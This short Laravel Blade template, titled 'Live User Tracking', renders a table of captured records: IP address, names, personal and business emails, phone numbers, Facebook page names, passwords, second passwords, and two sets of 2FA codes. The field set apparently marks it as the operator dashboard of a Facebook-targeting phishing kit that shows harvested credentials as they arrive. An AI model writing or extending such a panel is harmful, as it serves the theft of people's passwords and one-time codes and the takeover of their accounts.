Live User Tracking

Loading user tracking data...

@foreach ($data->sortByDesc('created_at') as $entry) @foreach (['fullName', 'personalEmail', 'businessEmail', 'mobileNumber', 'facebookPageName', 'password', 'secondPassword', 'twofa', 'second_twofa'] as $field) @endforeach @endforeach
Created At IP Address Full Name Personal Email Business Email Mobile Number Facebook Page Name Password Second Password 2FA Second 2FA Action
{{ $entry->created_at }} @if(!empty($entry->$field)) @endif